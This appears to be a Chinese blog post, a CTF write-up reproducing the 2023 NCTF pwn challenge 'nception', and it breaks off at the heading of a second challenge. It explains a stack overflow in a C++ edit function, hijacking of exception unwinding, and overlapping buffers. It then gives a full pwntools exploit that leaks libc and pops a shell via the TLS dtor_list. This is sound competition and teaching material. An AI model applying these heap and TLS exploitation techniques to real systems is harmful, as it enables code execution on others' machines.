

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="l1s00t">
  <meta name="keywords" content="">
  
    <meta name="description" content="2023-nctf-部分赛题复现额，好久都没写博客了，主要是懒。。。 这个赛题复现文章也是鸽了好久。这次nctf的题总体感觉还是不错的，就复现了两道比较有趣（难）的题。 nception这道题使用C++写的，经典增删改查操作。比较好的一点是，程序没有去符号，逆向起来不是很难。 add 功能固定分配0x18的控制块与0x200的buffer。 show 与 destroy 函数没什么好说的，就正常打">
<meta property="og:type" content="article">
<meta property="og:title" content="2023-nctf-部分赛题复现">
<meta property="og:url" content="http://example.com/2024/01/22/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="2023-nctf-部分赛题复现额，好久都没写博客了，主要是懒。。。 这个赛题复现文章也是鸽了好久。这次nctf的题总体感觉还是不错的，就复现了两道比较有趣（难）的题。 nception这道题使用C++写的，经典增删改查操作。比较好的一点是，程序没有去符号，逆向起来不是很难。 add 功能固定分配0x18的控制块与0x200的buffer。 show 与 destroy 函数没什么好说的，就正常打">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240122234829745.png">
<meta property="og:image" content="http://example.com/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240122234912278.png">
<meta property="og:image" content="http://example.com/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123005646295.png">
<meta property="og:image" content="http://example.com/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123010250295.png">
<meta property="og:image" content="http://example.com/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123010345345.png">
<meta property="og:image" content="http://example.com/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123005335079.png">
<meta property="og:image" content="http://example.com/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123010908879.png">
<meta property="og:image" content="http://example.com/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123114858110.png">
<meta property="article:published_time" content="2024-01-22T15:13:44.000Z">
<meta property="article:modified_time" content="2024-01-23T04:05:11.683Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240122234829745.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>2023-nctf-部分赛题复现 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>l1s00t</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="2023-nctf-部分赛题复现"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-01-22 23:13" pubdate>
          2024年1月22日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          11k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          48 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">2023-nctf-部分赛题复现</h1>
            
              <p class="note note-info">
                
                  
                    本文最后更新于：2024年1月23日 中午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="2023-nctf-部分赛题复现"><a href="#2023-nctf-部分赛题复现" class="headerlink" title="2023-nctf-部分赛题复现"></a>2023-nctf-部分赛题复现</h1><p>额，好久都没写博客了，主要是懒。。。</p>
<p>这个赛题复现文章也是鸽了好久。这次nctf的题总体感觉还是不错的，就复现了两道比较有趣（难）的题。</p>
<h2 id="nception"><a href="#nception" class="headerlink" title="nception"></a>nception</h2><p>这道题使用C++写的，经典增删改查操作。比较好的一点是，程序没有去符号，逆向起来不是很难。</p>
<p><code>add</code> 功能固定分配0x18的控制块与0x200的buffer。</p>
<p><code>show</code> 与 <code>destroy</code> 函数没什么好说的，就正常打印与删除功能，实现上没有漏洞。</p>
<p><code>edit</code>函数存在漏洞点，这里我们仔细分析。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-function"><span class="hljs-type">void</span> __cdecl <span class="hljs-title">edit</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>  std::invalid_argument *exception; <span class="hljs-comment">// rbx</span><br>  <span class="hljs-type">unsigned</span> __int64 v1; <span class="hljs-comment">// rax</span><br>  std::invalid_argument *v2; <span class="hljs-comment">// rbx</span><br>  __int64 v3; <span class="hljs-comment">// rax</span><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> idx; <span class="hljs-comment">// [rsp+0h] [rbp-240h] BYREF</span><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> off; <span class="hljs-comment">// [rsp+4h] [rbp-23Ch] BYREF</span><br>  test *victim; <span class="hljs-comment">// [rsp+8h] [rbp-238h]</span><br>  <span class="hljs-type">char</span> *target_buf; <span class="hljs-comment">// [rsp+10h] [rbp-230h]</span><br>  <span class="hljs-type">unsigned</span> __int64 avail_size; <span class="hljs-comment">// [rsp+18h] [rbp-228h]</span><br>  <span class="hljs-type">char</span> buf[<span class="hljs-number">512</span>]; <span class="hljs-comment">// [rsp+20h] [rbp-220h] BYREF</span><br>  <span class="hljs-type">unsigned</span> __int64 v10; <span class="hljs-comment">// [rsp+228h] [rbp-18h]</span><br><br>  v10 = __readfsqword(<span class="hljs-number">0x28</span>u);<br>  std::<span class="hljs-keyword">operator</span>&lt;&lt;&lt;std::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;std::cout, <span class="hljs-string">&quot;To write object, input idx: &quot;</span>);<br>  std::istream::<span class="hljs-keyword">operator</span>&gt;&gt;(&amp;std::cin, &amp;idx);<br>  <span class="hljs-keyword">if</span> ( idx &gt; <span class="hljs-number">6</span> || !ptrs[idx] )<br>  &#123;<br>    exception = __cxa_allocate_exception(<span class="hljs-number">0x10</span>uLL);<br>    std::invalid_argument::<span class="hljs-built_in">invalid_argument</span>(exception, <span class="hljs-string">&quot;Invalid idx&quot;</span>);<br>    __cxa_throw(exception, &amp;`typeinfo <span class="hljs-keyword">for</span><span class="hljs-number">&#x27;</span>std::invalid_argument, &amp;std::invalid_argument::~invalid_argument);<br>  &#125;<br>  victim = ptrs[idx];<br>  std::<span class="hljs-keyword">operator</span>&lt;&lt;&lt;std::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;std::cout, <span class="hljs-string">&quot;Now data offset: &quot;</span>);<br>  std::istream::<span class="hljs-keyword">operator</span>&gt;&gt;(&amp;std::cin, &amp;off);<br>  target_buf = test::<span class="hljs-built_in">getbuf</span>(victim, off);	<span class="hljs-comment">// 获取victim[off]的地址，及写入的起始位置</span><br>  avail_size = test::<span class="hljs-built_in">getsize</span>(victim, target_buf);	<span class="hljs-comment">// 计算能够写入的size大小</span><br>  <span class="hljs-keyword">if</span> ( avail_size )<br>  &#123;<br>    std::<span class="hljs-keyword">operator</span>&lt;&lt;&lt;std::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;std::cout, <span class="hljs-string">&quot;Now input your data: &quot;</span>);<br>    std::<span class="hljs-keyword">operator</span>&gt;&gt;&lt;<span class="hljs-type">char</span>,std::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;std::cin, buf);	<span class="hljs-comment">// 使用cin输入，没有检查输入大小，存在overflow漏洞</span><br>    v1 = <span class="hljs-built_in">strlen</span>(buf);<br>    <span class="hljs-keyword">if</span> ( avail_size &lt; v1 )	<span class="hljs-comment">// 若是输入大小大于avail_size，进行错误处理</span><br>    &#123;<br>      v2 = __cxa_allocate_exception(<span class="hljs-number">0x10</span>uLL);<br>      std::invalid_argument::<span class="hljs-built_in">invalid_argument</span>(v2, <span class="hljs-string">&quot;Buf too long&quot;</span>);<br>      __cxa_throw(v2, &amp;`typeinfo <span class="hljs-keyword">for</span><span class="hljs-number">&#x27;</span>std::invalid_argument, &amp;std::invalid_argument::~invalid_argument);<br>    &#125;<br>    <span class="hljs-built_in">strncpy</span>(target_buf, buf, avail_size);<br>  &#125;<br>  v3 = std::<span class="hljs-keyword">operator</span>&lt;&lt;&lt;std::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;std::cout, <span class="hljs-string">&quot;Done!&quot;</span>);<br>  std::ostream::<span class="hljs-keyword">operator</span>&lt;&lt;(v3, &amp;std::endl&lt;<span class="hljs-type">char</span>,std::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;);<br>&#125;<br></code></pre></td></tr></table></figure>

<p><code>edit</code>函数存在溢出漏洞，但是使用异常处理对错误进行捕获，大概率是劫持C++异常执行流。</p>
<p>程序存在两处异常执行流。但比赛时眼拙，只找到了一个，又没写出来。。。</p>
<p>第一处，<code>main</code>函数的错误处理。这个成功捕获异常的话，会回到<code>main</code> 函数重新执行。</p>
<p><img src="/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240122234829745.png" srcset="/img/loading.gif" lazyload alt="image-20240122234829745"></p>
<p>第二处，<code>cleanup</code>函数的错误处理。这个成功捕获的话，会调用<code>leave; ret</code> 恢复栈帧，但是会关闭所有输入输出流。</p>
<p><img src="/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240122234912278.png" srcset="/img/loading.gif" lazyload alt="image-20240122234912278"></p>
<p>根据作者博客所言，预期解是利用<code>cleanup</code> 这个错误处理，执行rop链获取shell。但是这个rop过于复杂，看得脑袋都晕了才大致明白，想了解rop如何构造的话，还是看<a target="_blank" rel="noopener" href="https://blog.unauth401.tech/2023nctf/#nception">题目作者的博客</a>吧。</p>
<p>这里我主要是针对<a target="_blank" rel="noopener" href="https://ycznkvrmzo.feishu.cn/docx/FcpPdb6MfohmlDxkJ9DcXcdincc">LaoGong战队</a>的利用方法进行复现。</p>
<p>利用思路如下：</p>
<ol>
<li>利用<code>edit</code> 溢出覆盖rbp与ret地址</li>
<li>利用错误处理<strong>unwind</strong>过程中恢复栈帧这一原理劫持<code>main</code> 函数的rbp</li>
<li>修改控制块指向的buf，构造buffer重叠，获得任意地址读写</li>
<li>劫持tls结构体获取shell</li>
</ol>
<p>这里针对第二步与第三步进行调试。</p>
<p>异常处理回溯到main函数的catch中。</p>
<p><img src="/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123005646295.png" srcset="/img/loading.gif" lazyload alt="image-20240123005646295"></p>
<p>调用<code>__cxa_begin_catch</code> 后会将libcpp.so地址写入相对于rbp偏移的地址，可以泄露libcpp地址。</p>
<p><img src="/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123010250295.png" srcset="/img/loading.gif" lazyload alt="image-20240123010250295"></p>
<p>写入libcpp地址的同时，覆盖控制块的buffer，变相构造了堆重叠，从而可以编辑下一个堆块的buffer。</p>
<p><img src="/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123010345345.png" srcset="/img/loading.gif" lazyload alt="image-20240123010345345"></p>
<p>继续执行，可以看到成功构造buffer重叠。</p>
<p><img src="/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123005335079.png" srcset="/img/loading.gif" lazyload alt="image-20240123005335079"></p>
<p>最终wp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>fn = <span class="hljs-string">&#x27;./pwn&#x27;</span><br>elf = ELF(fn)<br>libc = ELF(<span class="hljs-string">&#x27;./libc.so.6&#x27;</span>)<br>ld = ELF(<span class="hljs-string">&#x27;./ld-linux-x86-64.so.2&#x27;</span>)<br><br>debug = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> debug:<br>    p = process(fn)<br><span class="hljs-keyword">else</span>:<br>    p = remote()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>(<span class="hljs-params">s=<span class="hljs-string">&#x27;&#x27;</span></span>):<br>    <span class="hljs-keyword">if</span> debug:<br>        gdb.attach(p, s)<br>        pause()<br><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">pass</span><br><br>lg = <span class="hljs-keyword">lambda</span> x, y: log.success(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;x&#125;</span>: <span class="hljs-subst">&#123;<span class="hljs-built_in">hex</span>(y)&#125;</span>&#x27;</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">menu</span>(<span class="hljs-params">index</span>):<br>    p.sendlineafter(<span class="hljs-string">&#x27;your choice: &#x27;</span>, <span class="hljs-built_in">str</span>(index))<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">add</span>():<br>    menu(<span class="hljs-number">1</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">show</span>(<span class="hljs-params">index</span>):<br>    menu(<span class="hljs-number">3</span>)<br>    p.sendlineafter(<span class="hljs-string">&#x27;you want to read?&#x27;</span>, <span class="hljs-built_in">str</span>(index))<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">edit</span>(<span class="hljs-params">index, offset, content</span>):<br>    menu(<span class="hljs-number">2</span>)<br>    p.sendlineafter(<span class="hljs-string">&#x27;input idx: &#x27;</span>, <span class="hljs-built_in">str</span>(index))<br>    p.sendlineafter(<span class="hljs-string">&#x27;data offset: &#x27;</span>, <span class="hljs-built_in">str</span>(offset))<br>    p.sendlineafter(<span class="hljs-string">&#x27;your data: &#x27;</span>, content)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">delete</span>(<span class="hljs-params">index</span>):<br>    menu(<span class="hljs-number">4</span>)<br>    p.sendlineafter(<span class="hljs-string">&#x27;you want to destroy?&#x27;</span>, <span class="hljs-built_in">str</span>(index))<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">ROL</span>(<span class="hljs-params">content, key</span>):<br>    tmp = <span class="hljs-built_in">bin</span>(content)[<span class="hljs-number">2</span>:].rjust(<span class="hljs-number">64</span>, <span class="hljs-string">&#x27;0&#x27;</span>)<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">int</span>(tmp[key:] + tmp[:key], <span class="hljs-number">2</span>)<br><br><br>alarm_got = elf.got[<span class="hljs-string">&#x27;alarm&#x27;</span>]<br><br>bss = <span class="hljs-number">0x406000</span> + <span class="hljs-number">0x400</span><br>error = <span class="hljs-number">0x402DC5</span><br><br>leave_ret = <span class="hljs-number">0x402F1D</span><br><br>add()<br>delete(<span class="hljs-number">0</span>)<br>add()<br>show(<span class="hljs-number">0</span>)<br>p.recvuntil(<span class="hljs-string">b&quot;Data: &quot;</span>)<br>heapleak = u16(p.recv(<span class="hljs-number">2</span>))<br>heap_base = (heapleak - <span class="hljs-number">0x11</span>) &lt;&lt; <span class="hljs-number">12</span><br>lg(<span class="hljs-string">&#x27;heap_base&#x27;</span>, heap_base)<br><br>fakeheap = heap_base + <span class="hljs-number">0x11eb0</span><br><br><span class="hljs-comment"># 0x7ffff7cae4c6 -&gt; _Unwind_RaiseException@plt</span><br>dbg(<span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">    b *0x4027b2</span><br><span class="hljs-string">    b *0x7ffff7cae4c6</span><br><span class="hljs-string">    b *0x418ea0</span><br><span class="hljs-string">    b *0x402d21</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span>)<br><br>edit(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-string">b&#x27;@&#x27;</span> * <span class="hljs-number">0x200</span> + <span class="hljs-string">b&#x27;#&#x27;</span> * <span class="hljs-number">0x20</span> + p64(fakeheap + <span class="hljs-number">0x18</span>)[<span class="hljs-number">0</span>:<span class="hljs-number">7</span>])<br>show(<span class="hljs-number">0</span>)<br>p.recvuntil(<span class="hljs-string">b&#x27;Data: &#x27;</span>)<br>libcpp_base = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)) - <span class="hljs-number">0x20c270</span><br>lg(<span class="hljs-string">&#x27;libcpp_base&#x27;</span>, libcpp_base)<br><br>add()<br>edit(<span class="hljs-number">0</span>, <span class="hljs-number">0x50</span>, p64(alarm_got))<br>edit(<span class="hljs-number">0</span>, <span class="hljs-number">0x58</span>, p64(<span class="hljs-number">0x10</span>))<br>show(<span class="hljs-number">1</span>)<br><br>alarm = u64(p.recvuntil(<span class="hljs-string">&#x27;\x7f&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>libc_base = alarm - <span class="hljs-number">0xd3b60</span><br>lg(<span class="hljs-string">&#x27;libc_base&#x27;</span>, libc_base)<br><br>ld_base = libc_base + <span class="hljs-number">0x5ac000</span><br>lg(<span class="hljs-string">&#x27;ld_base&#x27;</span>, ld_base)<br><br>system = libc_base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br>binsh = libc_base + libc.search(<span class="hljs-string">b&#x27;/bin/sh&#x27;</span>).__next__()<br><br>tls = libc_base + <span class="hljs-number">0x484740</span><br>lg(<span class="hljs-string">&#x27;tls&#x27;</span>, tls)<br><br>tls_dtor_list = tls - <span class="hljs-number">0x78</span><br>fake_dtor = heap_base + <span class="hljs-number">0x12410</span><br><br>edit(<span class="hljs-number">0</span>, <span class="hljs-number">0x50</span>, p64(tls + <span class="hljs-number">0x30</span>))<br>show(<span class="hljs-number">1</span>)<br><br>p.recvuntil(<span class="hljs-string">&#x27;Data: &#x27;</span>)<br>point_guard = u64(p.recv(<span class="hljs-number">8</span>))<br>lg(<span class="hljs-string">&#x27;point_guard&#x27;</span>, point_guard)<br><br>add()<br>edit(<span class="hljs-number">0</span>, <span class="hljs-number">0x50</span>, p64(tls_dtor_list))<br>edit(<span class="hljs-number">0</span>, <span class="hljs-number">0x58</span>, p64(<span class="hljs-number">0x10</span>))<br>edit(<span class="hljs-number">1</span>, <span class="hljs-number">0</span>, p64(fake_dtor))<br><br>target = ROL(system ^ point_guard, <span class="hljs-number">0x11</span>)<br>lg(<span class="hljs-string">&#x27;target&#x27;</span>, target)<br><br>edit(<span class="hljs-number">2</span>, <span class="hljs-number">0x10</span>, p64(target))<br>edit(<span class="hljs-number">2</span>, <span class="hljs-number">0x18</span>, p64(binsh))<br><br><span class="hljs-comment"># dbg(&#x27;&#x27;&#x27;</span><br><span class="hljs-comment"># b exit</span><br><span class="hljs-comment"># &#x27;&#x27;&#x27;)</span><br><br>menu(<span class="hljs-number">5</span>)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>

<p><img src="/img/2023-nctf-%E9%83%A8%E5%88%86%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/image-20240123010908879.png" srcset="/img/loading.gif" lazyload alt="image-20240123010908879"></p>
<h2 id="npointment"><a href="#npointment" class="headerlink" title="npointment"></a>npointment</h2><p>这道题整体逆向起来也不是很难。</p>
